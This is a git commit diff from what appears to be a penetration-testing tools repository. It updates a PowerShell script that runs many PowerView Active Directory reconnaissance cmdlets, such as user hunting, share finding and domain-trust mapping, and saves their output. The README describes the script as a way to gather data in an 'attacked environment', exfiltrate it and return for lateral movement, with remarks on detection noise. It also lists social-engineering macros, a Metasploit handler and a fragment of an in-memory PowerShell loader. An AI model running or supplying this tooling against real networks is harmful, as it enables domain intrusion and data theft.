Updated Export-ReconData

This commit is contained in:
mb 2018-12-19 15:11:15 +01:00
parent e7b0abd3d4
commit 04bd92f502
3 changed files with 219 additions and 80 deletions

View File

@ -1,113 +1,131 @@
#requires -version 2
<#
This script launches many PowerView cmdlets and stores their output in Clixml
files for later processing. This script is compatible with newest PowerView's version,
from dev branch (as of 2018) that uses Get-Domain*, Find-* (instead of Invoke-*) and others cmdlets.
This script launches many PowerView cmdlets and stores their output
in Clixml files for later processing.
Author: Mariusz B. (mgeeky), '18
License: BSD 3-Clause
Required Dependencies: PowerSploit's Recon.psm1
Author: Mariusz B. (mgeeky), '18
License: BSD 3-Clause
Required Dependencies: PowerSploit's Recon.psm1
#>
function Export-ReconData
{
$DirName = (Get-Date).ToString("PowerView-MM-dd-yyyy-hh-mm-ss")
New-Item -Name $DirName -ItemType Directory | Out-Null
$DirName = (Get-Date).ToString("PowerView-MM-dd-yyyy-hh-mm-ss")
New-Item -Name $DirName -ItemType Directory | Out-Null
Write-Output "`n:: Logs to be stored in: $DirName`n"
Write-Output "`n:: Logs to be stored in: $DirName`n"
$ReconModuleCommands = Get-Command -Module Recon
$Commands = @()
$ReconModuleCommands = Get-Command -Module Recon
$Commands = @()
$ReconModuleCommands `
| Where-Object {$_.Name -like "Get-Net*"} `
| Select Name `
| ForEach-Object {$Commands += $_.Name}
$ReconModuleCommands `
| Where-Object {$_.Name -like "Get-Domain*" -or $_.Name -like "Get-Forest*" -or $_.Name -like "Get-Net*"} `
| Select Name `
| ForEach-Object {$Commands += $_.Name}
$Commands += "Invoke-UserHunter -ShowAll"
$Commands += "Invoke-StealthUserHunter -ShowAll"
$Commands += "Invoke-FileFinder -SearchSYSVol"
$Commands += "Invoke-ShareFinder"
$Commands += "Invoke-MapDomainTrust"
$Commands += "Find-GPOLocation"
$Commands += "Get-NetUser -AdminCount"
$Commands += "Find-ForeignUser"
$Commands += "Find-ForeignGroup"
$Commands += "Invoke-FileFinder"
$Commands += "Find-DomainUserLocation -ShowAll"
$Commands += "Find-InterestingDomainShareFile"
$Commands += "Find-DomainShare"
$Commands += "Get-DomainTrustMapping"
$Commands += "Get-DomainGPOUserLocalGroupMapping"
$Commands += "Get-DomainUser -AdminCount"
$Commands += "Get-DomainForeignUser"
$Commands += "Get-DomainForeignGroupMember"
$Commands += "Find-InterestingDomainShareFile"
$Commands | ForEach-Object {
$Name = $_
$Name -match "[A-Za-z]+-(.+)" | Out-Null
$IdentityBased = @(
"Get-DomainGroupMember",
"Get-DomainGPOComputerLocalGroupMapping",
"Get-DomainGPOUserLocalGroupMapping"
)
$FileName = $matches[1] + ".xml"
$FileName = $FileName -replace ' ',''
$ToSkip = @(
"Get-DomainDNSRecord",
"Get-DomainObject",
"Get-DomainObjectAttributeHistory",
"Get-DomainObjectLinkedAttributeHistory",
"Get-DomainSPNTicket",
"Get-DomainUserEvent",
"Get-ForestSchemaClass"
)
If ($Name -like "Get-Net*")
{
#$Name = $Name + " -Recurse"
}
$Commands | ForEach-Object {
$Name = $_
$Name -match "[A-Za-z]+-(.+)" | Out-Null
Write-Output "--- $Name ---"
$Name | Invoke-Expression | Export-Clixml $DirName\$FileName
Write-Output "Done.`n"
}
$FileName = $matches[1] + ".xml"
$FileName = $FileName -replace ' ',''
If ($IdentityBased -match $Name ) {
$Name = $Name + " -Identity 'Domain Admins'"
}
ElseIf ($ToSkip -match $Name) {
}
Else {
Write-Output "--- $Name ---"
$Name | Invoke-Expression | Export-Clixml $DirName\$FileName
Write-Output "Done.`n"
}
}
}
function Import-ReconData
{
Param
(
[Parameter(Position = 0, Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$DirName
)
$path = Get-Location
Set-Location -Path $DirName
Param
(
[Parameter(Position = 0, Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$DirName
)
$path = Get-Location
Set-Location -Path $DirName
Get-ChildItem . -Filter *.xml |
Foreach-Object {
$Name = $_.BaseName -replace '-',''
$Results = Import-Clixml -Path "$_"
New-Variable -Name $Name -Force -Value $Results -Scope Global
Write-Output "Loaded `$$Name results."
}
Get-ChildItem . -Filter *.xml |
Foreach-Object {
$Name = $_.BaseName -replace '-',''
$Results = Import-Clixml -Path "$_"
New-Variable -Name $Name -Force -Value $Results -Scope Global
Write-Output "Loaded `$$Name results."
}
Set-Location -Path $path
Set-Location -Path $path
}
function Get-ReconData
{
Param
(
[Parameter(Position = 0, Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$DirName
)
$path = Get-Location
$Variables = Get-Variable
Set-Location -Path $DirName
Param
(
[Parameter(Position = 0, Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$DirName
)
$path = Get-Location
$Variables = Get-Variable
Set-Location -Path $DirName
Get-ChildItem . -Filter *.xml |
Foreach-Object {
$Name = $_.BaseName -replace '-',''
If ($Variables | Where-Object { $_.Name -eq $Name })
{
Write-Output "Previously loaded: `$$Name"
}
}
Get-ChildItem . -Filter *.xml |
Foreach-Object {
$Name = $_.BaseName -replace '-',''
If ($Variables | Where-Object { $_.Name -eq $Name })
{
Write-Output "Previously loaded: `$$Name"
}
}
Set-Location -Path $path
Set-Location -Path $path
}
Try
{
# You need to be in PowerSploit\Recon directory
Import-Module .\Recon.psm1
# You need to be in PowerSploit\Recon directory
Import-Module .\Recon.psm1
}
Catch [System.Exception]
{
exit
exit
}

View File

@ -18,10 +18,11 @@ IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Com
- **`delete-warning-div-macro.vbs`** - VBA Macro function to be used as a Social Engineering trick removing "Enable Content" warning message as the topmost floating text box with given name. ([gist](https://gist.github.com/mgeeky/9cb6acdec31c8a70cc037c84c77a359c))
- **`Export-ReconData.ps1`** - Powershell script leveraging [PowerSploit Recon](https://github.com/PowerShellMafia/PowerSploit) module (PowerView) to save output from Reconnaissance cmdlets like `Get-Net*`, `Invoke-*` into _Clixml_ files. Those files (stored in an output directory as separate XML files) can later be extracted from attacked environment and loaded to a new powershell runspace using the same script. Very useful when we want to obtain as many data as possible, then exfiltrate that data, review it in our safe place and then get back to attacked domain for lateral spread. **Warning**: Be careful though, as this script launches many reconnaissance commands one by one, this WILL generate a lot of noise. Microsoft ATA for instance for sure pick you up with _"Reconnaissance using SMB session enumeration"_ after you've launched `Invoke-UserHunter`.
- **`Export-ReconData.ps1`** - Powershell script leveraging [PowerSploit Recon](https://github.com/PowerShellMafia/PowerSploit) module (PowerView) to save output from Reconnaissance cmdlets like `Get-*`, `Find-*` into _Clixml_ files. Those files (stored in an output directory as separate XML files) can later be extracted from attacked environment and loaded to a new powershell runspace using the same script. Very useful when we want to obtain as many data as possible, then exfiltrate that data, review it in our safe place and then get back to attacked domain for lateral spread. **Warning**: Be careful though, as this script launches many reconnaissance commands one by one, this WILL generate a lot of noise. Microsoft ATA for instance for sure pick you up with _"Reconnaissance using SMB session enumeration"_ after you've launched `Invoke-UserHunter`.
**WARNING:** At the moment this script works only with older version of PowerView - from before 12 dev 2016, where
it had Get-NetUser/Get-NetComputer/Get-Net* commands only.
**WARNING:** This script is compatible with newer version of PowerView (coming from dev branch as of 2018),
that exposed various `Get-Domain*`, `Find-*` cmdlets. In order to save recon's data from the older PowerView,
refer to my `Save-ReconData.ps1` script in this directory.
Exposed functions:
- `Export-ReconData` - Launches many cmdlets and exports their Clixml outputs.
@ -201,6 +202,13 @@ PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree
- [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques.
- **`Save-ReconData.ps1`** - Powershell script leveraging [PowerSploit Recon](https://github.com/PowerShellMafia/PowerSploit) module (PowerView) to save output from Reconnaissance cmdlets like `Get-*`, `Find-*` into _Clixml_ files. It differs from `Export-ReconData.ps1` in that it supports only older PowerView version from before 12 dec 2016.
Exposed functions:
- `Save-ReconData` - Launches many cmdlets and exports their Clixml outputs.
- `Load-ReconData -DirName <DIR>` - Loads Clixml previously exported outputs and stores them in Global variables reachable when script terminates.
- `Get-ReconData -DirName <DIR>` - Gets names of variables that were created and contains previously imported data.
- **`set-handler.rc`** - Quickly set metasploit's multi-handler + web_delivery (separated) handler for use with powershell. ([gist](https://gist.github.com/mgeeky/bf4d732aa6e602ca9b77d089fd3ea7c9))
- **`SubstitutePageMacro.vbs`** - This is a template for the Malicious Macros that would like to substitute primary contents of the document (like luring/fake warnings to "Enable Content") and replace document's contents with what is inside of an AutoText named `RealDoc` (configured via variable `autoTextTemplateName` ). ([gist](https://gist.github.com/mgeeky/3c705560c5041ab20c62f41e917616e6))

View File

@ -0,0 +1,113 @@
#requires -version 2
<#
This script launches many PowerView cmdlets and stores their output
in Clixml files for later processing.
Author: Mariusz B. (mgeeky), '18
License: BSD 3-Clause
Required Dependencies: PowerSploit's Recon.psm1
#>
function Export-ReconData
{
$DirName = (Get-Date).ToString("PowerView-MM-dd-yyyy-hh-mm-ss")
New-Item -Name $DirName -ItemType Directory | Out-Null
Write-Output "`n:: Logs to be stored in: $DirName`n"
$ReconModuleCommands = Get-Command -Module Recon
$Commands = @()
$ReconModuleCommands `
| Where-Object {$_.Name -like "Get-Net*"} `
| Select Name `
| ForEach-Object {$Commands += $_.Name}
$Commands += "Invoke-UserHunter -ShowAll"
$Commands += "Invoke-StealthUserHunter -ShowAll"
$Commands += "Invoke-FileFinder -SearchSYSVol"
$Commands += "Invoke-ShareFinder"
$Commands += "Invoke-MapDomainTrust"
$Commands += "Find-GPOLocation"
$Commands += "Get-NetUser -AdminCount"
$Commands += "Find-ForeignUser"
$Commands += "Find-ForeignGroup"
$Commands += "Invoke-FileFinder"
$Commands | ForEach-Object {
$Name = $_
$Name -match "[A-Za-z]+-(.+)" | Out-Null
$FileName = $matches[1] + ".xml"
$FileName = $FileName -replace ' ',''
If ($Name -like "Get-Net*")
{
#$Name = $Name + " -Recurse"
}
Write-Output "--- $Name ---"
$Name | Invoke-Expression | Export-Clixml $DirName\$FileName
Write-Output "Done.`n"
}
}
function Import-ReconData
{
Param
(
[Parameter(Position = 0, Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$DirName
)
$path = Get-Location
Set-Location -Path $DirName
Get-ChildItem . -Filter *.xml |
Foreach-Object {
$Name = $_.BaseName -replace '-',''
$Results = Import-Clixml -Path "$_"
New-Variable -Name $Name -Force -Value $Results -Scope Global
Write-Output "Loaded `$$Name results."
}
Set-Location -Path $path
}
function Get-ReconData
{
Param
(
[Parameter(Position = 0, Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$DirName
)
$path = Get-Location
$Variables = Get-Variable
Set-Location -Path $DirName
Get-ChildItem . -Filter *.xml |
Foreach-Object {
$Name = $_.BaseName -replace '-',''
If ($Variables | Where-Object { $_.Name -eq $Name })
{
Write-Output "Previously loaded: `$$Name"
}
}
Set-Location -Path $path
}
Try
{
# You need to be in PowerSploit\Recon directory
Import-Module .\Recon.psm1
}
Catch [System.Exception]
{
exit
}